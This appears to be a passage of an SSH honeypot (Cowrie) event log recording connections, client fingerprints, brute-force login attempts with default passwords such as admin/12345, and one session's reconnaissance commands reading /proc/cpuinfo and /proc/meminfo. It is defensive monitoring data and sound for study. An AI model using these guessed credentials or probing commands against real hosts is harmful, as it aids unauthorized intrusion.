{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.225067Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.226944Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.227955Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.229197Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.230192Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.231601Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.232195Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.233116Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.234085Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.249241Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.250130Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.251379Z","src_ip":"185.207.106.177","session":"fc224bdec622"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:07:25.589306Z","src_ip":"80.94.95.112","session":"91bc3d8c53ce"}
{"eventid":"cowrie.login.failed","username":"1234","password":"1234","message":"login attempt [1234/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T18:07:35.706753Z","src_ip":"171.243.150.185","session":"ac4bda469f2b"}
{"eventid":"cowrie.session.closed","duration":"49.5","message":"Connection lost after 49.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:07:36.936050Z","src_ip":"171.243.150.185","session":"ac4bda469f2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41794,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd438c2c365e","protocol":"ssh","message":"New connection: 212.227.125.160:41794 (1.2.3.4:22) [session: dd438c2c365e]","sensor":"my-vps","timestamp":"2025-08-28T18:07:39.177199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:07:39.223608Z","src_ip":"212.227.125.160","session":"dd438c2c365e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:07:39.410930Z","src_ip":"212.227.125.160","session":"dd438c2c365e"}
{"eventid":"cowrie.login.failed","username":"1234","password":"1234","message":"login attempt [1234/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T18:07:41.738141Z","src_ip":"212.227.125.160","session":"dd438c2c365e"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:07:43.943275Z","src_ip":"212.227.125.160","session":"dd438c2c365e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52390,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e50eaf34249","protocol":"ssh","message":"New connection: 217.72.205.35:52390 (1.2.3.4:22) [session: 5e50eaf34249]","sensor":"my-vps","timestamp":"2025-08-28T18:07:47.920656Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:07:47.921811Z","src_ip":"217.72.205.35","session":"5e50eaf34249"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:07:53.375686Z","src_ip":"212.227.235.229","session":"ba137cee92b0"}
{"eventid":"cowrie.session.closed","duration":"79.1","message":"Connection lost after 79.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:08:04.336795Z","src_ip":"171.243.150.220","session":"514b1a7bfc9d"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":45806,"dst_ip":"1.2.3.4","dst_port":22,"session":"523ddc2c79ff","protocol":"ssh","message":"New connection: 199.195.253.95:45806 (1.2.3.4:22) [session: 523ddc2c79ff]","sensor":"my-vps","timestamp":"2025-08-28T18:08:06.062855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:08:06.070379Z","src_ip":"199.195.253.95","session":"523ddc2c79ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:08:06.264193Z","src_ip":"199.195.253.95","session":"523ddc2c79ff"}
{"eventid":"cowrie.login.failed","username":"tmp","password":"test","message":"login attempt [tmp/test] failed","sensor":"my-vps","timestamp":"2025-08-28T18:08:06.982608Z","src_ip":"199.195.253.95","session":"523ddc2c79ff"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:08:08.184434Z","src_ip":"199.195.253.95","session":"523ddc2c79ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42604,"dst_ip":"1.2.3.4","dst_port":22,"session":"703742d990fb","protocol":"ssh","message":"New connection: 212.227.235.229:42604 (1.2.3.4:22) [session: 703742d990fb]","sensor":"my-vps","timestamp":"2025-08-28T18:08:22.202817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:08:22.203715Z","src_ip":"212.227.235.229","session":"703742d990fb"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:08:22.307343Z","src_ip":"212.227.235.229","session":"703742d990fb"}
{"eventid":"cowrie.login.failed","username":"sol","password":"1234567","message":"login attempt [sol/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T18:08:22.619607Z","src_ip":"212.227.235.229","session":"703742d990fb"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:08:23.724916Z","src_ip":"212.227.235.229","session":"703742d990fb"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":38266,"dst_ip":"1.2.3.4","dst_port":22,"session":"45425a74b6d0","protocol":"ssh","message":"New connection: 171.243.150.185:38266 (1.2.3.4:22) [session: 45425a74b6d0]","sensor":"my-vps","timestamp":"2025-08-28T18:08:24.426853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:08:24.433097Z","src_ip":"171.243.150.185","session":"45425a74b6d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47784,"dst_ip":"1.2.3.4","dst_port":22,"session":"978321f0963a","protocol":"ssh","message":"New connection: 212.227.125.160:47784 (1.2.3.4:22) [session: 978321f0963a]","sensor":"my-vps","timestamp":"2025-08-28T18:08:24.487907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:08:24.513608Z","src_ip":"212.227.125.160","session":"978321f0963a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:08:24.636939Z","src_ip":"171.243.150.185","session":"45425a74b6d0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:08:24.751983Z","src_ip":"212.227.125.160","session":"978321f0963a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T18:08:26.969531Z","src_ip":"212.227.125.160","session":"978321f0963a"}
{"eventid":"cowrie.login.failed","username":"nikita","password":"nikita","message":"login attempt [nikita/nikita] failed","sensor":"my-vps","timestamp":"2025-08-28T18:08:27.793246Z","src_ip":"171.243.150.185","session":"45425a74b6d0"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:08:28.256736Z","src_ip":"212.227.125.160","session":"978321f0963a"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":33272,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dbcecafd1d1","protocol":"ssh","message":"New connection: 171.243.150.220:33272 (1.2.3.4:22) [session: 0dbcecafd1d1]","sensor":"my-vps","timestamp":"2025-08-28T18:08:28.774102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:08:28.777194Z","src_ip":"171.243.150.220","session":"0dbcecafd1d1"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:08:29.006829Z","src_ip":"171.243.150.185","session":"45425a74b6d0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:08:29.019499Z","src_ip":"171.243.150.220","session":"0dbcecafd1d1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T18:08:31.368927Z","src_ip":"171.243.150.220","session":"0dbcecafd1d1"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:08:33.069035Z","src_ip":"171.243.150.220","session":"0dbcecafd1d1"}
